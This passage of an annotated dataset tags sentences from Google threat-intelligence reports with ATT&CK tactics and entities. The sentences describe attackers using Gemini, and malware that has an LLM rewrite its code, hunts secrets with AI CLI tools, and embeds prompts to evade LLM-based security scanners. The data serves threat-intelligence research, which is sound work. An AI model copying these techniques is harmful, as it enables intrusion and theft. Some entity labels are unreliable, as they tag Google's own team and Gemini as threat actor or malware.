"T1566", "name": "Phishing" } ], "procedure": "Targeting a range of operating systems and employing social engineering", "entities": [ { "text": "The group", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "argeting a range of operating systems ", "start": 41, "end": 79, "label": "Action" }, { "text": "employing social engineering compromises", "start": 124, "end": 164, "label": "Action" }, { "text": "operating systems across mobile and desktop devices", "start": 61, "end": 112, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s90-1f0010", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "The group has demonstrated a history of targeting a range of operating systems across mobile and desktop devices as well as employing social engineering compromises for their operations.", "sentence_text": "Specifically, the group leverages open forums to both lure victims to exploit-hosting infrastructure and to prompt installation of malicious mobile applications.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Leverages open forums to lure victims to exploit-hosting infrastructure", "entities": [ { "text": "leverages ", "start": 24, "end": 34, "label": "Action" }, { "text": " lure ", "start": 53, "end": 59, "label": "Action" }, { "text": "malicious mobile applications", "start": 131, "end": 160, "label": "MalwareTool" }, { "text": "prompt installation", "start": 108, "end": 127, "label": "Action" }, { "text": "open forums", "start": 34, "end": 45, "label": "Infrastructure_Indicator" }, { "text": " exploit-hosting infrastructure ", "start": 69, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "the group", "start": 14, "end": 23, "label": "ThreatActor" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s91-b94d97", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "Specifically, the group leverages open forums to both lure victims to exploit-hosting infrastructure and to prompt installation of malicious mobile applications.", "sentence_text": "In order to support their campaigns, the actor was seeking out technical support for C++ and Golang code for multiple tools including a C2 framework called OSSTUN by the actor.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Seeking technical support for C++ and Golang code for C2 framework OSSTUN", "entities": [ { "text": "seeking out technical support for C++ and Golang ", "start": 51, "end": 100, "label": "Action" }, { "text": "C2 framework called OSSTUN", "start": 136, "end": 162, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s92-839f7b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "In order to support their campaigns, the actor was seeking out technical support for C++ and Golang code for multiple tools including a C2 framework called OSSTUN by the actor.", "sentence_text": "The group was also observed prompting Gemini for help with code obfuscation, with prompts related to two publicly available obfuscation libraries.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Prompting Gemini for help with code obfuscation", "entities": [ { "text": "Gemini", "start": 38, "end": 44, "label": "MalwareTool" }, { "text": " prompting Gemini for help with code obfuscation", "start": 27, "end": 75, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s93-63db71", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "The group was also observed prompting Gemini for help with code obfuscation, with prompts related to two publicly available obfuscation libraries.", "sentence_text": "We have identified Gemini activity that indicates threat actors are soliciting the tool to help create articles or aid them in building tooling to automate portions of their workflow.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Soliciting Gemini to create articles and build tooling to automate their workflow", "entities": [ { "text": "help create articles", "start": 91, "end": 111, "label": "Action" }, { "text": "aid them in building tooling", "start": 115, "end": 143, "label": "Action" }, { "text": "soliciting the tool", "start": 68, "end": 87, "label": "Action" }, { "text": "automate portions of their workflow.", "start": 147, "end": 183, "label": "Action" }, { "text": "Gemini", "start": 19, "end": 25, "label": "MalwareTool" }, { "text": "threat actors", "start": 50, "end": 63, "label": "ThreatActor" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s94-83c03a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "We have identified Gemini activity that indicates threat actors are soliciting the tool to help create articles or aid them in building tooling to automate portions of their workflow.", "sentence_text": "None of these attempts have created breakthrough capabilities for IO campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s95-01a754", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "None of these attempts have created breakthrough capabilities for IO campaigns.", "sentence_text": "Building AI Safely and Responsibly", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s96-94562c", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "Building AI Safely and Responsibly", "sentence_text": "We believe our approach to AI must be both bold and responsible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s97-9d99f1", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "We believe our approach to AI must be both bold and responsible.", "sentence_text": "That means developing AI in a way that maximizes the positive benefits to society while addressing the challenges.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s98-2c8169", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "That means developing AI in a way that maximizes the positive benefits to society while addressing the challenges.", "sentence_text": "Our\npolicy guidelines\nand prohibited use policies prioritize safety and responsible use of Google's generative AI tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s99-e9ff2a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "Our\npolicy guidelines\nand prohibited use policies prioritize safety and responsible use of Google's generative AI tools.", "sentence_text": "We continuously enhance safeguards in our products to offer scaled protections to users across the globe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s100-ffc72e", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "We continuously enhance safeguards in our products to offer scaled protections to users across the globe.", "sentence_text": "At Google,\nwe leverage threat intelligence to disrupt adversary operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s101-26ff07", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "At Google,\nwe leverage threat intelligence to disrupt adversary operations.", "sentence_text": "Moreover, our learnings from countering malicious activities are fed back into our product development to improve safety and security for our AI models.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s102-b7ba0b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "Moreover, our learnings from countering malicious activities are fed back into our product development to improve safety and security for our AI models.", "sentence_text": "Google DeepMind also develops threat models for generative AI to identify potential vulnerabilities, and creates new evaluation and training techniques to address misuse.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s103-f14a55", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "Google DeepMind also develops threat models for generative AI to identify potential vulnerabilities, and creates new evaluation and training techniques to address misuse.", "sentence_text": "As innovation moves forward, the industry needs security standards for building and deploying AI responsibly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s104-c66528", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "As innovation moves forward, the industry needs security standards for building and deploying AI responsibly.", "sentence_text": "That's why we introduced the Secure AI Framework (SAIF)\n, a conceptual framework to secure AI systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s105-04d7ff", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "That's why we introduced the Secure AI Framework (SAIF)\n, a conceptual framework to secure AI systems.", "sentence_text": "Big Sleep has since found its first real-world security vulnerability and assisted in finding a vulnerability that was imminently going to be used by threat actors, which GTIG was able to cut off beforehand.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s106-3ad6a5", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "Big Sleep has since found its first real-world security vulnerability and assisted in finding a vulnerability that was imminently going to be used by threat actors, which GTIG was able to cut off beforehand.", "sentence_text": "We’re also experimenting with AI to not only find vulnerabilities, but also patch them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s107-d2c593", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "We’re also experimenting with AI to not only find vulnerabilities, but also patch them.", "sentence_text": "We recently introduced CodeMender , an experimental AI-powered agent utilizing the advanced reasoning capabilities of our Gemini models to automatically fix critical code vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s108-0591f2", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "We recently introduced CodeMender , an experimental AI-powered agent utilizing the advanced reasoning capabilities of our Gemini models to automatically fix critical code vulnerabilities.", "sentence_text": "Our work includes countering threats from government-backed attackers, targeted zero-day exploits, coordinated information operations (IO), and serious cyber crime networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s109-4bcff4", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "Our work includes countering threats from government-backed attackers, targeted zero-day exploits, coordinated information operations (IO), and serious cyber crime networks.", "sentence_text": "We apply our intelligence to improve Google's defenses and protect our users and customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s110-6f2b9e", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "We apply our intelligence to improve Google's defenses and protect our users and customers.", "sentence_text": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nPreparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s111-346857", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nPreparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read [FILTERED_TABLES_START]\nFRUITSHELL | Reverse Shell | Publicly available reverse shell written in PowerShell that establishes a remote connection to a configured command-and-control server and allows a threat actor to execute arbitrary commands on a compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Reverse Shell establishes a remote connection to C2 server", "entities": [ { "text": "FRUITSHELL", "start": 296, "end": 306, "label": "MalwareTool" }, { "text": "Reverse Shell ", "start": 309, "end": 323, "label": "MalwareTool" }, { "text": "command-and-control server", "start": 433, "end": 459, "label": "Infrastructure_Indicator" }, { "text": "establishes a remote connection", "start": 385, "end": 416, "label": "Action" }, { "text": "execute arbitrary commands", "start": 489, "end": 515, "label": "Action" }, { "text": " Deliver ", "start": 20, "end": 29, "label": "Action" }, { "text": "Steal Credentials", "start": 41, "end": 58, "label": "Action" }, { "text": "Google Threat Intelligence Group", "start": 62, "end": 94, "label": "ThreatActor" }, { "text": " Threat Intelligence Pro-Russia Information Operations ", "start": 110, "end": 165, "label": "ThreatActor" }, { "text": "Leverage ", "start": 165, "end": 174, "label": "Action" }, { "text": "Google Threat Intelligence Group", "start": 223, "end": 255, "label": "ThreatActor" }, { "text": "PowerShell", "start": 369, "end": 379, "label": "MalwareTool" }, { "text": "threat actor ", "start": 473, "end": 486, "label": "ThreatActor" }, { "text": "Malware", "start": 29, "end": 36, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s112-7c766b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read [FILTERED_TABLES_START]\nFRUITSHELL | Reverse Shell | Publicly available reverse shell written in PowerShell that establishes a remote connection to a configured command-and-control server and allows a threat actor to execute arbitrary commands on a compromised system.", "sentence_text": "Notably, this code family contains hard-coded prompts meant to bypass detection or analysis by LLM-powered security systems.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "The code family contains hard-coded prompts to bypass LLM security system detection", "entities": [ { "text": " code family", "start": 13, "end": 25, "label": "MalwareTool" }, { "text": "bypass detection or analysis", "start": 63, "end": 91, "label": "Action" }, { "text": " LLM-powered security systems.", "start": 94, "end": 124, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s113-7f64d6", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "Notably, this code family contains hard-coded prompts meant to bypass detection or analysis by LLM-powered security systems.", "sentence_text": "| Observed in operations PROMPTFLUX", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s114-8b6ecd", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "| Observed in operations PROMPTFLUX", "sentence_text": "Its primary capability is regeneration, which it achieves by using the Google Gemini API.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Achieves regeneration by using the Gemini API", "entities": [ { "text": " Google Gemini API.", "start": 70, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "regeneration", "start": 26, "end": 38, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s115-1a24bf", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "Its primary capability is regeneration, which it achieves by using the Google Gemini API.", "sentence_text": "It prompts the LLM to rewrite its own source code, saving the new, obfuscated version to the Startup folder to establish persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Prompts LLM to rewrite and save obfuscated source code to Startup folder", "entities": [ { "text": " LLM", "start": 14, "end": 18, "label": "MalwareTool" }, { "text": "source code", "start": 38, "end": 49, "label": "MalwareTool" }, { "text": " rewrite its own source code", "start": 21, "end": 49, "label": "Action" }, { "text": "saving the new, obfuscated version to the Startup folder", "start": 51, "end": 107, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s116-462bf8", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "It prompts the LLM to rewrite its own source code, saving the new, obfuscated version to the Startup folder to establish persistence.", "sentence_text": "PROMPTFLUX also attempts to spread by copying itself to removable drives and mapped network shares.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1570", "name": "Lateral Tool Transfer" } ], "procedure": "Copies itself to removable drives and network shares to spread", "entities": [ { "text": "PROMPTFLUX", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": " attempts to spread by copying itself", "start": 15, "end": 52, "label": "Action" }, { "text": "removable drives and mapped network shares", "start": 56, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s117-244d25", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "PROMPTFLUX also attempts to spread by copying itself to removable drives and mapped network shares.", "sentence_text": "It leverages an LLM to dynamically generate and execute malicious Lua scripts at runtime.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "LLM dynamically generate and execute malicious Lua scripts", "entities": [ { "text": "LLM", "start": 16, "end": 19, "label": "MalwareTool" }, { "text": "Lua scripts", "start": 66, "end": 77, "label": "MalwareTool" }, { "text": " dynamically generate and execute malicious Lua scripts at runtime.", "start": 22, "end": 89, "label": "Action" }, { "text": "leverages", "start": 3, "end": 12, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s118-0f3432", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "It leverages an LLM to dynamically generate and execute malicious Lua scripts at runtime.", "sentence_text": "Its capabilities include filesystem reconnaissance, data exfiltration, and file encryption on both Windows and Linux systems.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Capabilities include reconnaissance, exfiltration, and file encryption", "entities": [ { "text": "Windows and Linux systems", "start": 99, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "filesystem reconnaissance", "start": 25, "end": 50, "label": "Action" }, { "text": " data exfiltration", "start": 51, "end": 69, "label": "Action" }, { "text": "file encryption", "start": 75, "end": 90, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s119-4d098b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "Its capabilities include filesystem reconnaissance, data exfiltration, and file encryption on both Windows and Linux systems.", "sentence_text": "Captured credentials are exfiltrated via creation of a publicly accessible GitHub repository.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1048", "name": "Exfiltration Over Alternative Protocol" } ], "procedure": "Exfiltrates captured credentials by creating a public GitHub repository", "entities": [ { "text": "publicly accessible GitHub", "start": 55, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "exfiltrated", "start": 25, "end": 36, "label": "Action" }, { "text": " repository", "start": 81, "end": 92, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s120-e57808", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "Captured credentials are exfiltrated via creation of a publicly accessible GitHub repository.", "sentence_text": "In addition to these tokens, QUIETVAULT leverages an AI prompt and on-host installed AI CLI tools to search for other potential secrets on the infected system and exfiltrate these files to GitHub as well.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "QUIETVAULT leverages AI tools to search for secrets and exfiltrate files to GitHub", "entities": [ { "text": "QUIETVAULT", "start": 29, "end": 39, "label": "MalwareTool" }, { "text": "AI CLI tools", "start": 85, "end": 97, "label": "MalwareTool" }, { "text": " GitHub", "start": 188, "end": 195, "label": "Infrastructure_Indicator" }, { "text": "earch for other potential secrets", "start": 102, "end": 135, "label": "Action" }, { "text": "exfiltrate these files to GitHub as well", "start": 163, "end": 203, "label": "Action" }, { "text": "leverages ", "start": 40, "end": 50, "label": "Action" }, { "text": " infected system", "start": 142, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s121-06bff8", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "In addition to these tokens, QUIETVAULT leverages an AI prompt and on-host installed AI CLI tools to search for other potential secrets on the infected system and exfiltrate these files to GitHub as well.", "sentence_text": "| Observed in operations Deepfake/Image Generation | Create lure content for phishing operations or bypass know your customer (KYC) security requirements Phishing Kits and Phishing Support", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Using deepfakes and phishing kits to create lures for phishing and bypass KYC", "entities": [ { "text": " Deepfake/Image Generation", "start": 24, "end": 50, "label": "MalwareTool" }, { "text": "Phishing Kits", "start": 154, "end": 167, "label": "MalwareTool" }, { "text": "Create lure content for phishing", "start": 53, "end": 85, "label": "Action" }, { "text": " bypass know your customer (KYC) security requirements", "start": 99, "end": 153, "label": "Action" }, { "text": " Phishing Support", "start": 171, "end": 188, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s122-2ed454", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "| Observed in operations Deepfake/Image Generation | Create lure content for phishing operations or bypass know your customer (KYC) security requirements Phishing Kits and Phishing Support", "sentence_text": "| Create engaging lure content or distribute phishing emails to a wider audience Vulnerability Exploitation | Provide publicly available research or searching for pre-existing vulnerabilities [FILTERED_TABLES_END]", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Creating/distributing phishing lures and researching vulnerabilities", "entities": [ { "text": "Create engaging lure content ", "start": 2, "end": 31, "label": "Action" }, { "text": "distribute phishing emails ", "start": 34, "end": 61, "label": "Action" }, { "text": "Provide publicly available research", "start": 110, "end": 145, "label": "Action" }, { "text": "earching for pre-existing vulnerabilities", "start": 150, "end": 191, "label": "Action" }, { "text": "Vulnerability Exploitation ", "start": 81, "end": 108, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s1-62a0d3", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis | Google Cloud Blog Threat Intelligence Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis April 29, 2025 Google Threat Intelligence Group Google Threat Intelligence Visibility and context on the threats that matter most.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s2-cb56c8", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis | Google Cloud Blog Threat Intelligence Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis April 29, 2025 Google Threat Intelligence Group Google Threat Intelligence Visibility and context on the threats that matter most.", "sentence_text": "Written by: Casey Charrier, James Sadowski, Clement Lecigne, Vlad Stolyarov Executive Summary Google Threat Intelligence Group (GTIG) tracked 75 zero-day vulnerabilities exploited in the wild in 2024, a decrease from the number we identified in 2023 (98 vulnerabilities), but still an increase from 2022 (63 vulnerabilities).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s3-d23c71", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "Written by: Casey Charrier, James Sadowski, Clement Lecigne, Vlad Stolyarov Executive Summary Google Threat Intelligence Group (GTIG) tracked 75 zero-day vulnerabilities exploited in the wild in 2024, a decrease from the number we identified in 2023 (98 vulnerabilities), but still an increase from 2022 (63 vulnerabilities).", "sentence_text": "Vendors continue to drive improvements that make some zero-day exploitation harder, demonstrated by both dwindling numbers across multiple categories and reduced observed attacks against previously popular targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s4-34edf2", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "Vendors continue to drive improvements that make some zero-day exploitation harder, demonstrated by both dwindling numbers across multiple categories and reduced observed attacks against previously popular targets.", "sentence_text": "We see zero-day exploitation targeting a greater number and wider variety of enterprise-specific technologies, although these technologies still remain a smaller proportion of overall exploitation when compared to end-user technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s5-9c7cfb", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "We see zero-day exploitation targeting a greater number and wider variety of enterprise-specific technologies, although these technologies still remain a smaller proportion of overall exploitation when compared to end-user technologies.", "sentence_text": "While the historic focus on the exploitation of popular end-user technologies and their users continues, the shift toward increased targeting of enterprise-focused products will require a wider and more diverse set of vendors to increase proactive security measures in order to reduce future zero-day exploitation attempts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s6-136347", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "While the historic focus on the exploitation of popular end-user technologies and their users continues, the shift toward increased targeting of enterprise-focused products will require a wider and more diverse set of vendors to increase proactive security measures in order to reduce future zero-day exploitation attempts.", "sentence_text": "For a deeper look at the trends discussed in this report, along with recommendations for defenders, register for our upcoming zero-day webinar Scope This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s7-78ee9e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "For a deeper look at the trends discussed in this report, along with recommendations for defenders, register for our upcoming zero-day webinar Scope This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2024.", "sentence_text": "We discuss how targeted vendors and exploited products drive trends that reflect threat actor goals and shifting exploitation approaches, and then closely examine several examples of zero-day exploitation from 2024 that demonstrate how actors use both historic and novel techniques to exploit vulnerabilities in targeted products.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploiting vulnerabilities in targeted products", "entities": [ { "text": " exploit vulnerabilities ", "start": 284, "end": 309, "label": "Action" }, { "text": "exploited products", "start": 36, "end": 54, "label": "Action" }, { "text": "threat actor", "start": 81, "end": 93, "label": "ThreatActor" }, { "text": "shifting exploitation approaches,", "start": 104, "end": 137, "label": "Action" }, { "text": "examine", "start": 155, "end": 162, "label": "Action" }, { "text": "zero-day exploitation", "start": 183, "end": 204, "label": "MalwareTool" }, { "text": "actors ", "start": 236, "end": 243, "label": "ThreatActor" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s8-cffec2", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "We discuss how targeted vendors and exploited products drive trends that reflect threat actor goals and shifting exploitation approaches, and then closely examine several examples of zero-day exploitation from 2024 that demonstrate how actors use both historic and novel techniques to exploit vulnerabilities in targeted products.", "sentence_text": "Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents through digital forensic investigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s9-9aa288", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents through digital forensic investigations.", "sentence_text": "The numbers presented here reflect our best understanding of current data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s10-d0b3ba", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "The numbers presented here reflect our best understanding of current data.", "sentence_text": "GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit a vulnerability", "entities": [ { "text": "maliciously exploited", "start": 52, "end": 73, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s11-654044", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available.", "sentence_text": "GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s12-b1f1ce", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days.", "sentence_text": "Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 